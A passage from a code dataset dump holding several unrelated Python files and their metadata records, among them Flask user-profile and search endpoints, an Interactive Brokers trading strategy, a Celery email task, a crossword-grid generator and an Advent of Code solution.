请求参数:无\n@api.route('/user/auth')\n@login_required\ndef get_user_auth():\n\t\"\"\"\n\t1.获取到用户id\n\t2.根据编号查询用户对象\n\t3.判断用户是否存在\n\t4.响应,携带真实姓名和身份证号\n\t:return:\n\t\"\"\"\n\t# 1.获取到用户id\n\tuser_id = g.user_id\n\n\t# 2.根据编号查询用户对象\n\ttry:\n\t\tuser = User.query.filter(User.id == user_id).first()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据库查询异常\")\n\n\t# 3.响应给前端\n\treturn jsonify(errno=RET.OK, errmsg=\"获取成功\", data=user.user_to_dict())\n\n\n# 功能描述:保存实名认证信息\n# 请求路径:/api/v1.0/auth\n# 请求方式:post\n# 请求参数:真实姓名,身份证号\n@api.route('/user/auth', methods=['post'])\n@login_required\ndef set_user_auth():\n\t\"\"\"\n\t1.获取用户编号\n\t2.获取参数\n\t3.根据编号查询用户对象\n\t4.更新用户的信息到数据库\n\t5.返回信息给前端页面\n\t:return:\n\t\"\"\"\n\t# 1.获取用户编号\n\tuser_id = g.user_id\n\n\t# 2.获取参数\n\tdata_dict = request.get_json()\n\treal_name = data_dict.get(\"real_name\")\n\tid_card = data_dict.get(\"id_card\")\n\n\t# 2.1 校验参数\n\tif not all([real_name, id_card]):\n\t\treturn jsonify(errnO=RET.DATAERR, errmsg=\"参数不完整\")\n\n\t# 3.根据编��查询用户对象\n\ttry:\n\t\tuser = User.query.filter(User.id == user_id).first()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据库查询异常\")\n\n\t# 4.设置用户信息\n\tuser.real_name = real_name\n\tuser.id_card = id_card\n\t# 4.更新用户的信息到数据库\n\ttry:\n\t\tdb.session.commit()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"数据库保存异常\")\n\n\t# 5.返回信息给前端页面\n\treturn jsonify(errno=RET.OK, errmsg=\"认证成功\")\n\n\n# 功能描述: 获取用户的房源\n# 请求路径: /api/v1.0/user/houses\n# 请求方式:GET\n# 请求参数: 无\n@api.route(\"/user/houses\")\n@login_required\ndef get_user_houses():\n\t\"\"\"\n\t1.获取到用户编号\n\t2.根据用户编号查询用户对象\n\t3.判断用户对象是否存在\n\t4.通过用户查询所有的房源user.houses -->list(house)\n\t5.将房屋列表中的所有对象都转成字典\n\t6.返回,携带所有房屋列表的信息\n\t:return:\n\t\"\"\"\n\t# 1.获取到用户编号\n\tuser_id = g.user_id\n\n\t# 2.根据用户编号查询用户对象\n\ttry:\n\t\tuser = User.query.filter(User.id == user_id).first()\n\texcept Exception as e:\n\t\tcurrent_app.logger.error(e)\n\t\treturn jsonify(errno=RET.DBERR, errmsg=\"查询数据库异常\")\n\n\t# 3.判断用户对象是否存在\n\tif not user:\n\t\treturn jsonify(errno=RET.DATAERR, errmsg=\"该用户不存在\")\n\n\t# 4.通过用户查询所有的房源user.houses -->list(house)\n\thouses = user.houses\n\n\t# 5.将房屋列表中的所有对象都转成字典\n\thouses_list = []\n\tif houses:\n\t\tfor house in houses:\n\t\t\thouses_list.append(house.to_basic_dict())\n\n\t# 6.返回,携带所有房屋列表的信息\n\treturn jsonify(errno=RET.OK, errmsg=\"获取房源信息成功\", data={\"houses\": houses_list})\n","sub_path":"ihome/ihome/api_1_0/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":8713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"87654081","text":"from big_algo_framework.big.general import *\nfrom big_algo_framework.big.indicators import *\nfrom big_algo_framework.big.resample_price_indicators import resample\nfrom big_algo_framework.ib.trade import *\nimport time\n\nclass Strat():\n def __init__(self, app, ticker, db):\n self.app = app\n self.ticker = ticker\n self.db = db\n self.indi = BIGIndicators()\n self.cont = StockContract()\n self.con = self.cont.getStockContract(ticker)\n\n self.tf_props = {\n \"1 day\": {'base_timeframe': '1 day', 'rule': '24H'},\n }\n\n def checkTradeConditions(self, direction, dashboard_dict):\n print(\"COMMENCING TICKER...: \", self.ticker)\n orders = self.db[\"orders\"]\n order_results = orders.find(orderType=\"STP\", status=(\"PreSubmitted\", \"Submitted\"))\n\n ticker_pos = []\n for row in order_results:\n ticker_pos.append(row['ticker'])\n print(ticker_pos)\n\n if self.ticker not in ticker_pos:\n #DAILY TIME FRAME RULES\n daily_resample = resample(self.db, [self.ticker], self.tf_props[\"1 day\"][\"base_timeframe\"], \"1 day\", self.tf_props[\"1 day\"][\"rule\"])\n daily_df = daily_resample.resample_price()\n daily_df.reset_index(level=0, inplace=True)\n\n #Get daily ATR\n daily_df[\"ATR\"] = self.indi.atr(daily_df, atr_length=14, atr_ma_type=\"ema\", adjust=False)[\"ATR\"]\n if daily_df[\"ATR\"].iloc[-1] > 2:\n self.app.reqContractDetails(12, self.con)\n time.sleep(1)\n\n order_dict = {}\n\n order_dict = {\"ticker\": self.ticker,\n \"strategy\": \"my_strategy\",\n \"entryTIF\": \"GTD\",\n \"entryGoodTillDate\": \"20211029 10:30:00\",\n \"OrderRef\": \"my_orderRed\",\n \"entryPrice\": 100,\n \"stopLossPrice\": 50,\n \"totalRisk\": 100,\n \"tp1\": 150,\n \"tp2\": 200\n }\n\n getAction(direction, order_dict)\n order_dict[\"quantity\"] = self.cont.getQuantity(order_dict)\n\n dashboard_dict[\"ticker\"] = self.ticker\n dashboard_dict[\"atr\"] = daily_df[\"ATR\"].iloc[-1]\n\n print(\"Sending orders...\")\n takeTrade(self.app, self.con, order_dict, dashboard_dict)\n self.writeDashboard(order_dict, dashboard_dict)\n\n def writeDashboard(self, order_dict, dashboard_dict):\n table = self.db[\"strategy\"]\n\n data = dict(parentOrderId1=dashboard_dict[\"parentOrderId1\"],\n profitOrderId1=dashboard_dict[\"profitOrderId1\"],\n stopLossOrderId1=dashboard_dict[\"stopLossOrderId1\"],\n parentOrderId2=dashboard_dict[\"parentOrderId2\"],\n profitOrderId2=dashboard_dict[\"profitOrderId2\"],\n stopLossOrderId2=dashboard_dict[\"stopLossOrderId2\"],\n entryPrice=order_dict[\"entryPrice\"],\n riskPerShare = order_dict[\"riskPerShare\"],\n ticker=dashboard_dict[\"ticker\"])\n\n table.upsert(data, ['orderId'])\n","sub_path":"sample_strategies/strat_class.py","file_name":"strat_class.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"235075128","text":"from flask import jsonify,request\nfrom src.core.web import app, render_view\nfrom src.db.DAO.mysqlDAO import DAOManagerMysql\n\n\n@app.route('/search',methods=('GET',))\ndef search():\n mysqlDM = DAOManagerMysql() \n # verficia si el toquen que se tiene en las cookies esta registrado en la bd y devulve el usuario corresponidente\n user = mysqlDM.do(mysqlDM.USER,mysqlDM.EXIST_TOKEN,request.cookies.get('token'))\n \n if user:\n search = request.args.get('search')\n users = mysqlDM.do(mysqlDM.USER, mysqlDM.GET_ALL,search)\n lista=[] \n for us in users:\n lista.append({'email':us.email})\n \n return jsonify(lista)\n\n return render_view('sign_in.html')","sub_path":"src/webapp/controllers/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"191765927","text":"from celery import shared_task\nfrom django.core.mail import send_mail\n\nfrom account.models import User\n\n\n@shared_task\ndef send_confirmation_email(user_id):\n\n user = User.objects.get(id=user_id)\n\n link = f'/activate/{user.confirmation_token}'\n body = f'To complete the authorization process you have to follow this link: {link}'\n\n send_mail(\n 'The last step',\n body,\n 'kyoto.cliche@gmail.com',\n [user.email],\n fail_silently=False,\n )\n","sub_path":"blog/account/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"254396513","text":"\"\"\" Works with digital ocean servers \"\"\"\nfrom requests import get\nimport digitalocean\n\n\nclass DoHandler(digitalocean.Manager):\n my_ip = ''\n\n def __init__(self):\n self.my_ip = get('https://api.ipify.org').text\n super(DoHandler).__init__()\n\n\n\n","sub_path":"do_handler.py","file_name":"do_handler.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"270246040","text":"import sys\nimport random\nfrom collections import deque \n\n\"\"\"BEGINS BLOCK PLACING SECTION\"\"\"\n\n#print out the puzzle\ndef print_puzzle(board, num_cols):\n final_string = \"\"\n for index, square in enumerate(board):\n if index % num_cols == 0 and index != 0:\n final_string += \"\\n\"\n final_string += (square + \" \")\n print(final_string)\n\n#add seed strings to the board\ndef add_words_to_board(board, num_cols, extra_words):\n for direction, row, col, legit_word in extra_words:\n coord = (col + (row * num_cols))\n if direction == 'H':\n for letter in legit_word:\n board[coord] = letter\n if letter == '#':\n symmetrical_index = len(board) - (coord + 1)\n board[symmetrical_index] = '#'\n coord += 1\n elif direction == 'V':\n for letter in legit_word:\n board[coord] = letter\n if letter == '#':\n symmetrical_index = len(board) - (coord + 1)\n board[symmetrical_index] = '#'\n coord += num_cols\n return board\n\n#fill in all open spaces with @ signs\ndef area_fill(board, num_rows, num_cols, row, col):\n if row < 0 or row >= num_rows or col < 0 or col >= num_cols:\n return board\n coord = (col + (row * num_cols))\n board[coord] = '@'\n if row-1 >= 0 and board[coord-num_cols] != '@' and board[coord-num_cols] != '#':\n board = area_fill(board, num_rows, num_cols, row-1, col)\n if row+1 < num_rows and board[coord+num_cols] != '@' and board[coord+num_cols] != '#':\n board = area_fill(board, num_rows, num_cols, row+1, col)\n if col-1 >= 0 and board[coord-1] != '@' and board[coord-1] != '#':\n board = area_fill(board, num_rows, num_cols, row, col-1)\n if col+1 < num_cols and board[coord+1] != '@' and board[coord+1] != '#':\n board = area_fill(board, num_rows, num_cols, row, col+1)\n return board\n\n#returns true or false if no part of board is cut off\ndef fully_connected(board, num_rows, num_cols):\n new_board = board.copy()\n index = new_board.index('-')\n area_filled_board = area_fill(new_board, num_rows, num_cols, index//num_cols, index % num_cols)\n if '-' in area_filled_board:\n return False\n else:\n return True\n\n#gets all implied squares for a given index\ndef get_implied_squares(board, index, num_rows, num_cols):\n #up\n current_index = index\n up_list = list()\n store_list = list()\n block = True\n for i in range(3):\n current_index -= num_cols\n if current_index >= 0:\n if board[current_index] == '#':\n if not block:\n for item in store_list:\n up_list.append(item)\n break\n else:\n store_list.append(current_index)\n block = False\n else:\n if not block:\n for item in store_list:\n up_list.append(item)\n break\n #down\n current_index = index\n down_list = list()\n store_list = list()\n block = True\n for i in range(3):\n current_index += num_cols\n if current_index < len(board):\n if board[current_index] == '#':\n if not block:\n for item in store_list:\n down_list.append(item)\n break\n else:\n store_list.append(current_index)\n block = False\n else:\n if not block:\n for item in store_list:\n down_list.append(item)\n break\n #right\n current_index = index\n right_list = list()\n store_list = list()\n the_row = current_index//num_cols\n block = True\n for i in range(3):\n current_index += 1\n if current_index // num_cols == the_row :\n if board[current_index] == '#':\n if not block:\n for item in store_list:\n right_list.append(item)\n break\n else:\n store_list.append(current_index)\n block = False\n else:\n if not block:\n for item in store_list:\n right_list.append(item)\n break\n #left\n current_index = index\n left_list = list()\n store_list = list()\n block = True\n for i in range(3):\n current_index -= 1\n if current_index // num_cols == the_row :\n if board[current_index] == '#':\n if not block:\n for item in store_list:\n left_list.append(item)\n break\n else:\n store_list.append(current_index)\n block = False\n else:\n if not block:\n for item in store_list:\n right_list.append(item)\n break\n total_list = list()\n total_list.append(up_list)\n total_list.append(down_list)\n total_list.append(right_list)\n total_list.append(left_list)\n return sum(total_list,[])\n\n#checks if given index has at least length 3 surrounding it\ndef check_min_length(board, index, num_rows, num_cols):\n #up\n current_index = index\n block = True\n for i in range(3):\n current_index -= num_cols\n if current_index >= 0:\n if board[current_index] == '#':\n if not block:\n return False\n else:\n block = False\n else:\n if not block:\n return False\n #down\n current_index = index\n block = True\n for i in range(3):\n current_index += num_cols\n if current_index < len(board):\n if board[current_index] == '#':\n if not block:\n return False\n else:\n block = False\n else:\n if not block:\n return False\n #right\n current_index = index\n the_row = current_index//num_cols\n block = True\n for i in range(3):\n current_index += 1\n if current_index // num_cols == the_row :\n if board[current_index] == '#':\n if not block:\n return False\n else:\n block = False\n else:\n if not block:\n return False\n #left\n current_index = index\n block = True\n for i in range(3):\n current_index -= 1\n if current_index // num_cols == the_row :\n if board[current_index] == '#':\n if not block:\n return False\n else:\n block = False\n else:\n if not block:\n return False\n return True\n \n#checks if the entire board is at least min length 3\ndef check_board_min_length_3(board, num_rows, num_cols):\n if len(board) % 2 == 0:\n final_index = int(len(board)/2)\n else:\n final_index = int((len(board)-1)/2)\n for index, square in enumerate(board[:final_index]):\n if square == '#':\n if not check_min_length(board, index, num_rows, num_cols):\n return False\n return True\n\n#finds all implied squares in the board\ndef find_implied(board, num_rows, num_cols):\n total = list()\n if len(board) % 2 == 0:\n final_index = int(len(board)/2)\n else:\n final_index = int((len(board)-1)/2)\n for index, square in enumerate(board[:final_index]):\n if board[index] == '#':\n total.append(get_implied_squares(board, index, num_rows, num_cols))\n return sum(total,[])\n\n#conducts search to place down all implied squares\ndef place_implied_squares(board, num_rows, num_cols, cur_blocks, final_blocks):\n implied_squares = deque(find_implied(board, num_rows, num_cols))\n visited = set(implied_squares)\n if len(implied_squares) == 0:\n return board\n while implied_squares:\n new_index = implied_squares.pop()\n if cur_blocks >= final_blocks: #more implied blocks to place but already all blocks have been placed so return None\n return None\n symmetric_index = len(board) - (new_index + 1)\n if board[new_index] == '-' and board[symmetric_index] == '-':\n board[new_index] = \"#\"\n board[symmetric_index] = '#'\n if symmetric_index == new_index:\n cur_blocks += 1\n else:\n cur_blocks += 2\n for new_square in find_implied(board, num_rows, num_cols):\n if new_square not in visited:\n implied_squares.append(new_square)\n visited.add(new_square)\n if not check_board_min_length_3(board, num_rows, num_cols):#check if at least length 3 all over board\n return None\n return board\n\n#returns (index, symmetrical index) for all possible moves in board sorted by the heuristic\ndef possibleMoves(board, num_rows, num_cols):\n possible_moves = list()\n if len(board) % 2 == 0:\n final_index = int(len(board)/2)\n else:\n final_index = int((len(board)-1)/2)\n for index, square in enumerate(board[:final_index]):\n symmetrical_index = len(board) - (index + 1)\n if square == '-' and board[symmetrical_index] == '-':\n possible_moves.append((index, symmetrical_index))\n random.shuffle(possible_moves)\n return possible_moves\n\n#backtracking method to place blocking squares\ndef place_blocking_squares(board, num_rows, num_cols, cur_blocks, final_blocks, block_placed):\n if cur_blocks == final_blocks:\n if fully_connected(board, num_rows, num_cols): #only goal tests because blocks are placed symmetrically and min_3_length checked in implied block section\n return board\n else:\n return None\n if block_placed and not fully_connected(board, num_rows, num_cols):\n return None\n elif cur_blocks >= final_blocks:\n return None\n for index, symmetrical_index in possibleMoves(board, num_rows, num_cols):\n new_board = board.copy()\n new_board[index] = '#'\n new_board[symmetrical_index] = '#'\n new_board = place_implied_squares(new_board, num_rows, num_cols, board.count('#'), final_blocks)\n if new_board is not None:\n result = place_blocking_squares(new_board, num_rows, num_cols, new_board.count('#'), final_blocks, True)\n else:\n result = None\n if result is not None:\n return result\n return None\n\narg_list = sys.argv\n#rows and columns\nr_n_c = arg_list[1]\nnum_rows = int(r_n_c[:r_n_c.index('x')])\nnum_cols = int(r_n_c[r_n_c.index('x')+1:])\n#blocking squares\nnum_blocking_squares = int(arg_list[2])\n#dictionary file\ndictionary_file = arg_list[3]\n#extra words\nextra_words = list()\nif len(arg_list) > 4:\n for word in arg_list[4:]:\n direction = word[0].upper()\n row = int(word[1:word.index('x')])\n start_index = None\n for index, char in enumerate(word):\n if index <= word.index('x'):\n continue\n if not char.isnumeric():\n start_index = index\n break\n col = int(word[word.index('x')+1:start_index])\n legit_word = word[start_index:]\n extra_words.append((direction, row, col, legit_word.upper()))\n#create board\nboard = [\"-\"] * (num_rows*num_cols)\nadd_words_to_board(board, num_cols, extra_words)\ntemp_board = place_implied_squares(board, num_rows, num_cols, board.count('#'), num_blocking_squares)\nif num_rows * num_cols == num_blocking_squares:\n final_board = [\"#\"] * (num_rows*num_cols)\nelif num_rows % 2 == 1 and num_cols % 2 == 1 and num_blocking_squares % 2 == 1:\n coord = int((((num_cols - 1)/2) + (((num_rows - 1)/2) * num_cols)))\n board[coord] = '#'\n final_board = place_blocking_squares(temp_board, num_rows, num_cols, board.count('#'), num_blocking_squares, False)\nelse:\n final_board = place_blocking_squares(temp_board, num_rows, num_cols, board.count('#'), num_blocking_squares, False)\nboard = final_board\nprint_puzzle(board, num_cols)\n\n\"\"\"BEGINS WORD PLACING SECTION\"\"\"\n\n#return list of tuples of all wordspaces on the board\ndef find_all_wordspaces(board, num_rows, num_cols):\n wordspace_list = list()\n wordspace_indices = dict()\n #horizontal\n for i in range(0, len(board), num_cols):\n empty = False\n for j in range(0, num_cols):\n if board[i+j] != '#' and not empty:\n empty = True\n cur_start_index = i+j\n cur_length = 0\n store_indices = []\n if board[i+j] == '#' and empty:\n empty = False\n cur_stop_index = i+j-1 #THIS IS THE LAST INDEX WHERE THE EMPTY SPACE IS!!!! \n wordspace_list.append((cur_start_index, cur_stop_index, 'H', cur_length))\n wordspace_indices[(cur_start_index, cur_stop_index, 'H', cur_length)] = store_indices\n cur_length = 0\n if empty:\n cur_length += 1\n store_indices.append(i+j)\n if empty:\n empty = False\n cur_stop_index = i+j\n wordspace_list.append((cur_start_index, cur_stop_index, 'H', cur_length))\n wordspace_indices[(cur_start_index, cur_stop_index, 'H', cur_length)] = store_indices\n #vertical\n for i in range(0, num_cols):\n empty = False\n for j in range(0, len(board), num_cols):\n if board[i+j] != '#' and not empty:\n empty = True\n cur_start_index = i+j\n cur_length = 0\n store_indices = []\n if board[i+j] == '#' and empty:\n empty = False\n cur_stop_index = i+j-num_cols #THIS IS THE LAST INDEX WHERE THE EMPTY SPACE IS!!!! \n wordspace_list.append((cur_start_index, cur_stop_index, 'V', cur_length))\n wordspace_indices[(cur_start_index, cur_stop_index, 'V', cur_length)] = store_indices\n cur_length = 0\n if empty:\n store_indices.append(i+j)\n cur_length += 1\n if empty:\n empty = False\n cur_stop_index = i+j\n wordspace_list.append((cur_start_index, cur_stop_index, 'V', cur_length))\n wordspace_indices[(cur_start_index, cur_stop_index, 'V', cur_length)] = store_indices\n return wordspace_list, wordspace_indices\n \n#return list of words ordered by letter frequency\ndef order_by_letter_frequency(word):\n score = 0\n for char in word:\n score -= letter_count[char]\n return score\n\n#return the wordspace with the least amount of possibilities:\ndef most_constrained_wordspace(wordspace_dict):\n cur_min_wordspace = None\n cur_min_length = float('inf')\n for key in wordspace_dict.keys():\n if len(wordspace_dict[key]) < cur_min_length:\n cur_min_length = len(wordspace_dict[key])\n cur_min_wordspace = key\n return cur_min_wordspace\n\n#return list of words that correspond to that wordspace\ndef possibleWords(wordspace_dict, wordspace):\n return sorted(wordspace_dict[wordspace], key=order_by_letter_frequency)\n\n#update all the words in the dictionary that we affected\ndef update_other_words(wordspace_dict, wordspace, wordspace_indices, board, num_rows, num_cols):\n word = ''\n if wordspace[2] == 'H':\n for i in range(wordspace[0], wordspace[1]+1):\n word += board[i]\n else:\n for i in range(wordspace[0], wordspace[1]+1, num_cols):\n word += board[i]\n indices_to_check = wordspace_indices[wordspace]\n for new_wordspace, set_of_words in wordspace_dict.items():\n indices = wordspace_indices[new_wordspace]\n if new_wordspace != wordspace:\n wordspace_dict[new_wordspace].discard(word)\n if any(index in indices for index in indices_to_check) and wordspace[2] != new_wordspace[2]:\n common_index = set(indices).intersection(set(indices_to_check)).pop()\n intersect_index = indices.index(common_index) #the index of the other wordspace where it intersects with the current word\n for new_word in list(wordspace_dict[new_wordspace]):\n if new_word[intersect_index] != board[common_index] and board[common_index] != '-':\n wordspace_dict[new_wordspace].remove(new_word)\n return wordspace_dict\n \n#place a word on the board in a given wordspace \ndef place_word(board, wordspace, word, num_rows, num_cols):\n cur_index = 0\n if wordspace[2] == 'H':\n for i in range(wordspace[0], wordspace[1]+1):\n board[i] = word[cur_index]\n cur_index += 1\n else:\n for i in range(wordspace[0], wordspace[1]+1, num_cols):\n board[i] = word[cur_index]\n cur_index += 1\n\n#backtracking method to place words\ndef place_all_words(board, num_rows, num_cols, wordspace_dict, letter_count):\n if board.count('-') == 0 and not wordspace_dict:\n return board\n for key in wordspace_dict.keys():\n if not wordspace_dict[key]:\n return None\n wordspace = most_constrained_wordspace(wordspace_dict)\n for word in possibleWords(wordspace_dict, wordspace):\n new_board = board.copy()\n place_word(new_board, wordspace, word, num_rows, num_cols)\n new_wordspace_dict = {x: wordspace_dict[x].copy() for x in wordspace_dict}\n new_wordspace_dict.pop(wordspace)\n new_wordspace_dict = update_other_words(new_wordspace_dict, wordspace, wordspace_indices, new_board, num_rows, num_cols)\n result = place_all_words(new_board, num_rows, num_cols, new_wordspace_dict, letter_count)\n if result is not None:\n return result\n return None\n\n#read in file\nlen_dict = dict() #dict of len:set of words of that length\nwith open(dictionary_file) as f:\n for count, line in enumerate(f):\n word = line.split()[0]\n if (len(word) > num_rows and len(word) > num_cols) or (len(word) < 3):\n continue\n if len(word) in len_dict.keys():\n len_dict[len(word)].add(word.upper())\n else:\n len_dict[len(word)] = {word.upper()}\n\nletter_count = dict() #dict of letter:count\nwith open(dictionary_file) as f:\n text = f.read().upper()\n for char in text:\n if char in letter_count.keys():\n letter_count[char] += 1\n else:\n letter_count[char] = 1\n\nwordspaces_list, wordspace_indices = find_all_wordspaces(board, num_rows, num_cols)\nwordspace_dict = dict()\nfor wordspace in wordspaces_list:\n set_of_words = len_dict[wordspace[3]].copy()\n wordspace_dict[wordspace] = set_of_words\nfor wordspace in wordspaces_list:\n update_other_words(wordspace_dict, wordspace, wordspace_indices, board, num_rows, num_cols)\nfinal_board = place_all_words(board, num_rows, num_cols, wordspace_dict, letter_count)\nprint_puzzle(final_board, num_cols)","sub_path":"unit4-crossword/crossword2.py","file_name":"crossword2.py","file_ext":"py","file_size_in_byte":19009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"550035023","text":"def count_steps(squares, decreasing=False):\n \"\"\"Count the amount of steps required to exit the square sequence.\"\"\"\n pos = 0\n count = 0\n while pos >= 0 and pos < len(squares):\n prev = pos\n pos += squares[pos]\n squares[prev] += -1 if decreasing and squares[prev] >= 3 else 1\n count += 1\n return count\n\n\nif __name__ == \"__main__\":\n with open(\"input.txt\") as file:\n input = file.read().strip()\n squares = list(map(int, input.splitlines()))\n print(count_steps(squares[:]))\n print(count_steps(squares[:], True))\n","sub_path":"d05/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"649033177","text":"#!python\nimport os, subprocess\nImport('cbenv')\n\n## project includes\n#cbenv.Append(CPPPATH=[Dir(\"./\")])\n\n## os env\nenv_os = cbenv.Clone()\nenv_os.SOURCES = [ Glob('*.cpp') ]\n\n## source files\nExport('env_os')\nSConscript('%s/SConstruct'%env_os['platform']) ## windows, x11, osx\n\ncbenv.SOURCES += env_os.SOURCES\n","sub_path":"os/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}